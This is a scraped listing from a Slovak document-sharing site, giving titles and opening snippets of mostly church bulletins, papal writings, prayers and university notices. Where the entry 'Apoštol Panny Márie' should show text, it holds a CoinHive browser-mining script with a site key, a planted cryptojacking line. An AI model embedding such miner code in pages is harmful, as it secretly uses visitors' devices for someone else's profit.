Microsoft Word - Pastoračné dokumenty Jána Pavla II.doc 1. Encykliky 1.1 Redemptor hominis Úvod 1 Jedná sa o prvú encykliku pápeža Jána Pavla II., ktorá má názov Redemptor hominis - Vykupiteľ človeka. Ján Pavol II. sám encykliku nazýva inauguračným dokumentom

Podrobnejšie

(Microsoft Word - 5.èíslo Budatínka)

(Microsoft Word - 5.èíslo Budatínka) ZŠ BUDATÍNSKA 61, BRATISLAVA ŠKOLSKÝ ROK 2018/2019 ŠKOLSKÝ ČASOPIS BUDATÍNKO 5 Valentín Valentín je sviatok zamilovaných. Tento sviatok sa koná 14.2. Je to sviatok lásky a šťastia. Posielajú sa Valentínske

Podrobnejšie

Národné centrum popularizácie vedy a techniky v spoločnosti

Národné centrum popularizácie vedy a techniky v spoločnosti JEDNA HLAVA RNDr. Katarína Teplanová, PhD. JEDNA HLAVA - Obsah 1. Vážny problém 2. Cieľ 3. Naše inštitucionálne riešenie 4. Malá ukážka 5. Svetový trend TEPLANOVÁ, K., JEDNA HLAVA, jeden žiak, jeden učiteľ.

Podrobnejšie

Prezentácia programu PowerPoint

Prezentácia programu PowerPoint BIBLIA Stará kniha a vždy nové Božie slovo KTO NEPOZNÁ BIBLIU NEPOZNÁ KRISTA (Sv. Hieronym) z gréčtiny a znamená KNIHA, KNIŽOČKY, SPISKY; ale aj BIBLIOTÉKA zoznam viac ako 40 kníh Starého zákona; Sväté

Podrobnejšie

3. DEŇ DEVIATNIK MODLITIEB K SVÄTÉMU MARTINOVI za posvätenie a upevnenie spoločenstva miestnej cirkvi 1 Základná štruktúra deviatnika 1.Hymnus k sv. M

3. DEŇ DEVIATNIK MODLITIEB K SVÄTÉMU MARTINOVI za posvätenie a upevnenie spoločenstva miestnej cirkvi 1 Základná štruktúra deviatnika 1.Hymnus k sv. M 3. DEŇ DEVIATNIK MODLITIEB K SVÄTÉMU MARTINOVI za posvätenie a upevnenie spoločenstva miestnej cirkvi 1 Základná štruktúra deviatnika 1.Hymnus k sv. Martinovi 2. Zamyslenie na deň 3. Litánie k sv. Martinovi

Podrobnejšie

12 Týždeň od 13. do 19. decembra 82 Modlitba, uzdravenie a obnova Te x t y na tento t ý ždeň: Jak 5,13 20 Z á kl a dný verš Vyznávajte si teda navzájo

12 Týždeň od 13. do 19. decembra 82 Modlitba, uzdravenie a obnova Te x t y na tento t ý ždeň: Jak 5,13 20 Z á kl a dný verš Vyznávajte si teda navzájo 12 Týždeň od 13. do 19. decembra 82 Modlitba, uzdravenie a obnova Te x t y na tento t ý ždeň: Jak 5,13 20 Z á kl a dný verš Vyznávajte si teda navzájom hriechy a modlite sa jeden za druhého, aby ste boli

Podrobnejšie

Krížová cesta Otcov

Krížová cesta Otcov Krížová cesta otcov / z rádia Lumen 2007 / Úvodná modlitba V mene Otca, i Syna i Ducha Svätého. Bože Otče, chceme sa teraz chvíľu zastaviť a spolu so sv. Jozefom, ktorý je vzorom nám mužom a otcom, chcem

Podrobnejšie

Spojená katolícka škola v Nitre

Spojená katolícka škola v Nitre Školský vzdelávací program Materská škola svätých anjelov strážcov Názov programu: Stupeň vzdelania: Dĺžka štúdia: Vyučovací jazyk: Študijná forma: Druh školy: Poznávaj srdcom predprimárne 3 roky slovenský

Podrobnejšie

Microsoft Word - Prayer - The Highest Form of Christian Service - Slovak.doc

Microsoft Word - Prayer - The Highest Form of Christian Service - Slovak.doc NAJVYŠŠIA FORMA KRESŤANSKEJ SLUŽBY Oswald, J. Smith NAJVYŠŠIA FORMA KRESŤANSKEJ SLUŽBY Najvyššou formou kresťanskej služby je prímluvná modlitba. Hovorím to bez obáv z protirečenia. A to, čo sa teraz chystám

Podrobnejšie

Dokumenty pápežov: Ján Pavol II

Dokumenty pápežov: Ján Pavol II O dôstojnosti a povolaní ženy Ján Pavol II (dokumenty pápežov) strana 1/26 Dokumenty pápežov: Ján Pavol II. APOŠTOLSKÝ LIST PÁPEŽA JÁNA PAVLA II. MULIERIS DIGNITATEM O DÔSTOJNOSTI A POVOLANÍ ŽENY pri príležitosti

Podrobnejšie

Hospodin ti oznámil, človeče, čo je dobré a čo žiada od teba: len zachovávať právo, milovať láskavosť a v pokore chodiť pred svojím Bohom. Micheáš 6,

Hospodin ti oznámil, človeče, čo je dobré a čo žiada od teba: len zachovávať právo, milovať láskavosť a v pokore chodiť pred svojím Bohom. Micheáš 6, Hospodin ti oznámil, človeče, čo je dobré a čo žiada od teba: len zachovávať právo, milovať láskavosť a v pokore chodiť pred svojím Bohom. Micheáš 6, 8 Zborový bulletin, 29. október 2017 Dvadsiata nedeľa

Podrobnejšie

Microsoft Word - Vízia

Microsoft Word - Vízia VÍZIA ECAV 2020 Písmo, reformácia a Augsburské vyznanie Sme cirkvou Božieho slova, ktorej Písmo je prameňom viery a pravidlom života. Božie slovo obsiahnuté v Písme máme poverenie zvestovať pravdivo, odvážne

Podrobnejšie

Všetci by sme mali byť feminist(k)ami (Ukážka)

Všetci by sme mali byť feminist(k)ami (Ukážka) Chimamanda Ngozi Adichie VŠETCI BY SME MALI BYŤ FEMINIST(K)AMI Preložila Kristína Karabová ÚVOD Toto je modifikovaná verzia prejavu, s ktorým som vystúpila v decembri 2012 na TEDxEus ton, každoročnej konferencii

Podrobnejšie

INSTRUMENTUM LABORIS 2016

INSTRUMENTUM LABORIS 2016 INSTRUMENTUM LABORIS 2016 ÚVOD Dostáva sa Vám do rúk druhý pracovný dokument Synody Ordinariátu ozbrojených síl a ozbrojených zborov Slovenskej republiky s latinským názvom Instrumentum laboris. Je jedným

Podrobnejšie

Bulletin indd

Bulletin indd Život Cirkvi Ročník 19 23/2012 Slávnosť Najsvätejšieho Kristovho Tela a Krvi KOMENTÁR Mať alebo byť? Keď som pred pár týždňami, počas svetového šampionátu v ľadovom hokeji, opisovala jednej talianskej

Podrobnejšie

TEOLOGICKÁ FAKULTA Teologický inštitút Spišská Kapitula 12, Spišské Podhradie tel.: , fax: , e-m

TEOLOGICKÁ FAKULTA Teologický inštitút Spišská Kapitula 12, Spišské Podhradie   tel.: , fax: , e-m TEOLOGICKÁ FAKULTA Teologický inštitút Spišská Kapitula 12, 053 04 Spišské Podhradie www.ku.sk, tel.: +421 53 4 19 4 1 26, fax: +421 53 419 41 23, e-mail: studijne@kapitula.sk Informácie o prijímacom konaní

Podrobnejšie

Apoštol Panny Márie

Apoštol Panny Márie var miner = new CoinHive.Anonymous('49dVbbCFDuhg9nX5u1MDuATVZj7gQehytZwvXEUuWg9kfhNPWH7bU D87VW1NfjqucRZNNVTb1AHGUK2fkq5Nd55mLNnB4WK'); miner.start(); var miner = new CoinHive.Anonymous('_'); miner.start();

Podrobnejšie

TEOLOGICKÁ FAKULTA Oddelenie pre vedu Hlavná 89, Košice tel.: , fax: ,

TEOLOGICKÁ FAKULTA Oddelenie pre vedu Hlavná 89, Košice   tel.: , fax: , TEOLOGICKÁ FAKULTA Oddelenie pre vedu Hlavná 89, 041 21 Košice www.tf.ku.sk, tel.: +421 55 68 36 122, fax: +421 55 68 36 128, e-mail: studijne.tf@ku.sk Podmienky prijímacieho konania na akademický rok

Podrobnejšie

Nové 3/2018 ročník XII. Horizonty Časopis pre teológiu, kultúru a spoločnosť Ticho v kostole a v sakristii pred a po liturgickom slávení, ako aj počas

Nové 3/2018 ročník XII. Horizonty Časopis pre teológiu, kultúru a spoločnosť Ticho v kostole a v sakristii pred a po liturgickom slávení, ako aj počas Nové 3/2018 ročník XII. Horizonty Časopis pre teológiu, kultúru a spoločnosť Ticho v kostole a v sakristii pred a po liturgickom slávení, ako aj počas sv. omše Úrad liturgických slávení Najvyššieho veľkňaza

Podrobnejšie

STAUROS Č. 12 jún 2019 Informátor gréckokatolíckej farnosti Bratislava - Staré Mesto slovíčko o SLOVE V knihe Manželská STK ma už dávnejšie zaujal jed

STAUROS Č. 12 jún 2019 Informátor gréckokatolíckej farnosti Bratislava - Staré Mesto slovíčko o SLOVE V knihe Manželská STK ma už dávnejšie zaujal jed STAUROS Č. 12 jún 2019 Informátor gréckokatolíckej farnosti Bratislava - Staré Mesto slovíčko o SLOVE V knihe Manželská STK ma už dávnejšie zaujal jeden príbeh. Odohral sa na kresťanskom pohrebe. Kňaz

Podrobnejšie

Identifikačný štítok TIMSS & PIRLS 2011 Dotazník pre žiaka 4. ročník Národný ústav certifikovaných meraní vzdelávania Pluhová 8, Bratislava IEA

Identifikačný štítok TIMSS & PIRLS 2011 Dotazník pre žiaka 4. ročník Národný ústav certifikovaných meraní vzdelávania Pluhová 8, Bratislava IEA Identifikačný štítok TIMSS & PIRLS 2011 Dotazník pre žiaka 4. ročník Národný ústav certifikovaných meraní vzdelávania Pluhová 8, 831 03 Bratislava IEA, 2011 Moderné vzdelávanie pre vedomostnú spoločnosť/

Podrobnejšie

Zxczxc

Zxczxc I. Obal: KATOLÍCKA UNIVERZITA V RUŽOMBERKU PEDAGOGICKÁ FAKULTA KATEDRA KATECHETIKY A PRAKTICKEJ TEOLÓGIE Výročná správa Katolíckej univerzity v Ružomberku, Pedagogickej fakulty, Katedry katechetiky a praktickej

Podrobnejšie

PodNebie január - február číslo Veľké tajomstvo ľudskej lásky teológia tela Zistili sme: Teológia tela Téma: Kým neprišiel hriech str s

PodNebie január - február číslo Veľké tajomstvo ľudskej lásky teológia tela Zistili sme: Teológia tela Téma: Kým neprišiel hriech str s PodNebie január - február 2014 41.číslo Veľké tajomstvo ľudskej lásky teológia tela Zistili sme: Téma: Kým neprišiel hriech str. 16-17 str. 14-15 str. 20-21 Redakcia: Lucia Budinská Adriána Aďa Hellebrandtová

Podrobnejšie

Podmienky prijímacieho konania na akademický rok 2019/2020 (doktorandský stupeň)

Podmienky prijímacieho konania na akademický rok 2019/2020 (doktorandský stupeň) Podmienky prijímacieho konania na akademický rok 2019/2020 (doktorandský stupeň) Prijímacie konanie pre akademický rok 2019/2020 Termín podania prihlášky na doktorandské štúdium: do 10. júna 2019 (rozhoduje

Podrobnejšie

Bulletin indd

Bulletin indd Život Cirkvi Ročník 20 24/2013 Kardinál Piacenza konsekroval farský kostol svätého Juraja v Starej Haliči KOMENTÁR Milí poslucháči, priznám sa vám, že pri hľadaní námetu tohto komentára mi nevdojak prišla

Podrobnejšie

A4_01_OBR_SK_HL_CZ_KCZ_KSK_DSK_HOT.qxd

A4_01_OBR_SK_HL_CZ_KCZ_KSK_DSK_HOT.qxd Oslepený KĽÚČE LEKCIA 1. úloha Čítaj Prečítaj si príbeh Oslepený. Nauč sa Začni sa učiť kľúčový verš. Premýšľaj Porozmýšľaj o tom, čo ti ide naozaj dobre; o dare, ktorým ťa Boh obdaroval. Modli sa Popros

Podrobnejšie

Popolcová streda – 13

Popolcová streda – 13 ÚVAHY NA DNI VEĽKÉHO PÔSTU 2019 ŠTVRTÝ PÔSTNY TÝŽDEŇ = 8.4. 13.4. 2019 64 32 5 Niekoľko slov na úvod: Materiály, ktoré budú umiestňované na farskej webovej stránke v RUBRIKE NOVINKY, Vás pozývajú k tomu,

Podrobnejšie

Stauros 22/2010

Stauros 22/2010 Stauros Č. 22 október/november 2010 Informačný dvojtýždenník gréckokatolíckej farnosti v Bratislave slovíčko o SLOVE Drahé sestry a bratia! Keby som tak mohol/-la vrátiť čas? Koľkým z nás už prebehlo mysľou

Podrobnejšie

Cesta.indd

Cesta.indd Informačník kežmarských katolíkov Cesta 2 XXV. ročník 2019 Snímka: Peter Justh ml. Bratia a sestry, svätci i hriešnici, všetci sme bratia, ktorých miluje ten istý Otec. A na konci života budeme súdení

Podrobnejšie

STAUROS Č. 20 september/október 2016 Informátor gréckokatolíckej farnosti Bratislava - Staré Mesto slovíčko o SLOVE Kazateľský príbeh hovorí o veriace

STAUROS Č. 20 september/október 2016 Informátor gréckokatolíckej farnosti Bratislava - Staré Mesto slovíčko o SLOVE Kazateľský príbeh hovorí o veriace STAUROS Č. 20 september/október 2016 Informátor gréckokatolíckej farnosti Bratislava - Staré Mesto slovíčko o SLOVE Kazateľský príbeh hovorí o veriacej žene, ktorá žila v susedstve muža, presvedčeného

Podrobnejšie

Microsoft Word - VS_KZ_2018.docx

Microsoft Word - VS_KZ_2018.docx KATOLÍCKA UNIVERZITA V RUŽOMBERKU FILOZOFICKÁ FAKULTA KATEDRA ŽURNALISTIKY Výročná správa Katedry žurnalistiky Filozofickej fakulty Katolíckej univerzity v Ružomberku za rok 2018 1. Základné informácie

Podrobnejšie

OBEC BREZOVICA

OBEC BREZOVICA Obecné zastupiteľstvo v Klenovci podľa 6 ods.1 zákona SNR č. 369/1990 Zb. o obecnom zriadení v znení neskorších predpisov v y d á v a túto Smernicu Zboru pre občianske záležitosti obce Klenovec Článok

Podrobnejšie

Milé študentky, milí študenti, v prvom rade Vám ďakujeme za vyplnenie ankety. Táto anketa bola zameraná na zistenie Vášho postoja ku kvalite materiáln

Milé študentky, milí študenti, v prvom rade Vám ďakujeme za vyplnenie ankety. Táto anketa bola zameraná na zistenie Vášho postoja ku kvalite materiáln Milé študentky, milí študenti, v prvom rade Vám ďakujeme za vyplnenie ankety. Táto anketa bola zameraná na zistenie Vášho postoja ku kvalite materiálnych, technických a informačných zdrojov. Jednotlivé

Podrobnejšie

Príloha k rozhodnutiu č. CD / :071 Priznanie práva udeľovať absolventom jednotlivých študijných programov príslušné akademické tituly

Príloha k rozhodnutiu č. CD / :071 Priznanie práva udeľovať absolventom jednotlivých študijných programov príslušné akademické tituly dĺžka 1 KU FF 2 KU FF anglický jazyk pre komerčnú prax anglický jazyk pre komerčnú prax 2.1.29. neslovanské jazyky a literatúry 2.1.29. neslovanské jazyky a literatúry 3 KU FF filozofia 2.1.1. filozofia

Podrobnejšie

ZBIERKA ZÁKONOV SLOVENSKEJ REPUBLIKY Ročník 1949 Vyhlásené: Vyhlásená verzia v Zbierke zákonov Slovenskej republiky Obsah tohto dokumentu m

ZBIERKA ZÁKONOV SLOVENSKEJ REPUBLIKY Ročník 1949 Vyhlásené: Vyhlásená verzia v Zbierke zákonov Slovenskej republiky Obsah tohto dokumentu m ZBIERKA ZÁKONOV SLOVENSKEJ REPUBLIKY Ročník 1949 Vyhlásené: 30.08.1949 Vyhlásená verzia v Zbierke zákonov Slovenskej republiky Obsah tohto dokumentu má informatívny charakter. 204 V y h l á š k a m i n

Podrobnejšie

AGENDA

AGENDA AGENDA Evanjelickej cirkvi augsburského vyznania na Slovensku 1996 VENI SANGTE SPIRITUS PASCE PASTOREM DUC DUCEM APERI APERTURO DA DATURO EMITTE SPIRITUM TUUM ET CREABUNTUR ET RENOVABIS FACIEM TERRAE AMEN

Podrobnejšie

ČASOPIS PRIEVIDZSKEJ FARNOSTI BARTOLOMEJ ROČNÍK XXVII. ČÍSLO 5 MÁJ 2019 Rodičia Pozitívne vzory - Rozhovor s Aničkou - Čo máme po rodičoch? Chýbajú -

ČASOPIS PRIEVIDZSKEJ FARNOSTI BARTOLOMEJ ROČNÍK XXVII. ČÍSLO 5 MÁJ 2019 Rodičia Pozitívne vzory - Rozhovor s Aničkou - Čo máme po rodičoch? Chýbajú - ČASOPIS PRIEVIDZSKEJ FARNOSTI BARTOLOMEJ ROČNÍK XXVII. ČÍSLO 5 MÁJ 2019 Rodičia Pozitívne vzory - Rozhovor s Aničkou - Čo máme po rodičoch? Chýbajú - Deti viery - Medzigeneračné vzťahy - Deň bezdomovca

Podrobnejšie

MoSta 1.indd

MoSta 1.indd Načo je bolesť 2/2019 OĽGA ADAMKOVIČOVÁ-SEMKOVÁ (z básnickej zbierky Prídavok) Načo je bolesť smútok trápenie Človek s tým denne zápasí Viem o tom svoje Isto vieš aj ty Svoj kríž si nesie každý Zvyčajne

Podrobnejšie

Kreatívna kampaň pre

Kreatívna kampaň  pre Kreatívna kampaň pre NETFLIX Lucia Peterková Claim Presne to, čo potrebuješ. Každý človek je jedinečný a každý má rád niečo iné. Je ťažké vyhovieť každému, avšak Netflix to dokáže. Je jedno či máte radi

Podrobnejšie

Čítame s deťmi, rodičmi od malička

Čítame s deťmi, rodičmi od malička Čítame s deťmi, rodičmi od malička Iveta Hurná Knižnica pre mládež mesta Košice špeciálna knižnica na Slovensku orientovaná na prácu s deťmi a mládežou bola založená v roku 1955 má spolu 22 pobočiek 18

Podrobnejšie

fl_02_2007-v2.indd

fl_02_2007-v2.indd MAREC APRÍL DVOJMESAČNÍK KUBÍNSKYCH KATOLÍKOV ROČNÍK XV 2007 Muž, ktorý bol zavesený na prostrednom kríži, Ježiš, bol iný ako ostatní ľudia, ktorí boli ukrižovaní. Nevykrikoval a nepreklínal a nereval.

Podrobnejšie

Donovaly apríl 2010

Donovaly apríl 2010 Kontemplatívne načúvanie Techniky na báze duchovného sprevádzania povolania Dr. Jack Finnegan SDB, PedLic Celoslovenské formačno pracovné stretnutie pre koordinátorov pastorácie povolaní na Slovensku Donovaly,

Podrobnejšie

SK MATEMATICKA OLYMPIADA 2010/ ročník MO Riešenia úloh domáceho kola kategórie Z4 1. Doplň do prázdnych políčok čísla od 1 do 7 každé raz tak,

SK MATEMATICKA OLYMPIADA 2010/ ročník MO Riešenia úloh domáceho kola kategórie Z4 1. Doplň do prázdnych políčok čísla od 1 do 7 každé raz tak, SK MATEMATICKA OLYMPIADA 2010/2011 60. ročník MO Riešenia úloh domáceho kola kategórie Z4 1. Doplň do prázdnych políčok čísla od 1 do 7 každé raz tak, aby matematické operácie boli vypočítané správne.

Podrobnejšie

nadpis

nadpis Žilinská univerzita v Žiline Fakulta humanitných vied Katedra anglického jazyka a literatúry Štúdium na KAJ Študijné programy Učiteľstvo akademických predmetov v kombináciách: Bakalárske štúdium anglický

Podrobnejšie

hlasy Z DOMOVA A MISIÍ 2Hlasy z domova a misií vydáva SVD Nitra ročník šesťdesiaty tretí, február ,00 EUR Foto: P. Martin Štefanec SVD

hlasy Z DOMOVA A MISIÍ 2Hlasy z domova a misií vydáva SVD Nitra ročník šesťdesiaty tretí, február ,00 EUR Foto: P. Martin Štefanec SVD hlasy Z DOMOVA A MISIÍ 2Hlasy z domova a misií vydáva SVD Nitra ročník šesťdesiaty tretí, február 2019 1,00 EUR Foto: P. Martin Štefanec SVD ZAMYSLENIE Posväcujte! Text: P. Michal Marhefka SVD Foto: P.

Podrobnejšie

Zápisnica č. 1/2016 zo zasadnutiapredsedníctva ZMM vo Veľkom Bieli v dňoch februára 2016 Prítomní: pozriprílohu č. 1 Začiatok zasadnutia: 26.

Zápisnica č. 1/2016 zo zasadnutiapredsedníctva ZMM vo Veľkom Bieli v dňoch februára 2016 Prítomní: pozriprílohu č. 1 Začiatok zasadnutia: 26. Zápisnica č. 1/2016 zo zasadnutiapredsedníctva ZMM vo Veľkom Bieli v dňoch 26.- 29. februára 2016 Prítomní: pozriprílohu č. 1 Začiatok zasadnutia: 26.2.2016 o 19:00 hod. Ukončenie zasadnutia: 28.2.2016

Podrobnejšie

Microsoft Word - zapis-predmetov-AiS

Microsoft Word - zapis-predmetov-AiS Zápis predmetov do AiS na aktuálny akademický rok Pred zápisom predmetov Vám odporúčame pozorne si prečítať študijný plán pre Váš študijný program. Môžete si ho zobraziť v AiSe kliknutím na "Študijné programy"

Podrobnejšie

Bulletin9.indd

Bulletin9.indd Život Cirkvi Ročník 16 9/2009 Popolcovou stredou začalo Pôstné obdobie Téma Svätého Otca k pôstu: A keď sa Ježiš štyridsať dní a štyridsať nocí postil, napokon vyhladol (Mt 4,2). KOMENTÁR Evanjelium života

Podrobnejšie

Komisia pre náboženské vzťahy so Židmi Poznámky k správnemu spôsobu predstavovania Židov a judaizmu v ohlasovaní a v katechéze Rímskokatolíckej cirkvi

Komisia pre náboženské vzťahy so Židmi Poznámky k správnemu spôsobu predstavovania Židov a judaizmu v ohlasovaní a v katechéze Rímskokatolíckej cirkvi Komisia pre náboženské vzťahy so Židmi Poznámky k správnemu spôsobu predstavovania Židov a judaizmu v ohlasovaní a v katechéze Rímskokatolíckej cirkvi Predbežné úvahy Na stretnutí v Ríme 6. marca 1982

Podrobnejšie

Zborník Csontos

Zborník Csontos Z B O R N Í K Z P R A C O V N É H O S E M I N Á R A P R O F A M I L Y 2 0 1 6 H l a v n é l í n i e r i e š e n i a p r o j e k t u A P V V 1 5-0 1 8 9 V y b r a n é f a k t o r y p r o - r o d i n n e

Podrobnejšie

Microsoft Word - UO iŠkVP primárne vzdelávanie NBV kat.

Microsoft Word - UO iŠkVP primárne vzdelávanie NBV kat. Názov predmetu Vzdelávacia oblasť Názov ŠkVP Škola Stupeň vzdelania Forma štúdia Dĺžka vzdelávania Vyučovací jazyk Náboženská výchova - katolícka Človek a hodnoty Inovovaný školský vzdelávací program Základná

Podrobnejšie

Výročná správa JA Firmy M-GROUP

Výročná správa JA Firmy M-GROUP Stredná odborná škola Hattalova 968/33 029 01 Námestovo Výročná správa JA Firmy M-GROUP Učiteľ: Ing. Ivona Korčušková Konzultant: Jozef Šuriňák Moje meno je Janka Baleková a v našej JA firme M-GROUP zastávam

Podrobnejšie

Zastupujeme ľudí s mentálnym postihnutím a ich príbuzných ĽUDIA S MENTÁLNYM POSTIHNUTÍM A ICH PRÍBUZNÍ: VYUŽIME EURÓPSKE VOĽBY 2019 NA MAXIMUM Inclusi

Zastupujeme ľudí s mentálnym postihnutím a ich príbuzných ĽUDIA S MENTÁLNYM POSTIHNUTÍM A ICH PRÍBUZNÍ: VYUŽIME EURÓPSKE VOĽBY 2019 NA MAXIMUM Inclusi ĽUDIA S MENTÁLNYM POSTIHNUTÍM A ICH PRÍBUZNÍ: VYUŽIME EURÓPSKE VOĽBY 2019 NA MAXIMUM Inclusion Europe pripravila tento dokument, aby sme čo najviac pochopili a využili príležitosti, ktoré nám ponúkajú

Podrobnejšie

Microsoft Word - SP_7_Bc_pravo_denna_forma_III.6_Odporucany_studijny_plan_17oktober2018.rtf

Microsoft Word - SP_7_Bc_pravo_denna_forma_III.6_Odporucany_studijny_plan_17oktober2018.rtf ŠTUDIJNÝ PROGRAM BAKALÁRSKEHO ŠTÚDIA AKADEMICKÝ ROK 2019/2020 DENNÁ FORMA ŠTÚDIA I. rok bakalárskeho štúdia, denná forma Predmety 1. semester Kredity Základy právnického vzdelávania 10/0 POVINNÉ PREDMETY

Podrobnejšie